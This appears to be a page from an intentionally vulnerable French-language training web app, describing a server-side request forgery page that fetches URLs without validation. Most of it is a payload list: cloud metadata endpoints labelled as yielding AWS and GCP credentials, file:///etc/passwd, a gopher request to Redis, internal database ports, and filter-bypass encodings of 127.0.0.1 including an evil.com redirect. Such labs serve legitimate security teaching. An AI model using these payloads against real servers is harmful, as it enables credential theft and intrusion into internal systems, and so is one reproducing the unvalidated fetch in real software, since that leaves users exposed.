ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!
Cette page permet de faire des requetes HTTP depuis le serveur sans validation.
http://127.0.0.1 ou http://localhosthttp://169.254.169.254/latest/meta-data/http://internal-api:8080file:///etc/passwdgopher://127.0.0.1:6379/_INFO| Target | URL | Description |
|---|---|---|
| Localhost | http://127.0.0.1:80 |
Serveur web local |
| Loopback IPv6 | http://[::1] |
Contournement de filtre |
| AWS Metadata | http://169.254.169.254/latest/meta-data/ |
Credentials AWS |
| GCP Metadata | http://metadata.google.internal/ |
Credentials GCP |
| File system | file:///etc/passwd |
Lecture de fichiers locaux |
| Internal service | http://localhost:3306 |
Base de donnees MySQL |
| Redis | http://localhost:6379 |
Cache Redis |
http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31http://2130706433 (= 127.0.0.1)http://0177.0.0.1http://[::ffff:127.0.0.1]http://evil.com/redirect?url=http://localhost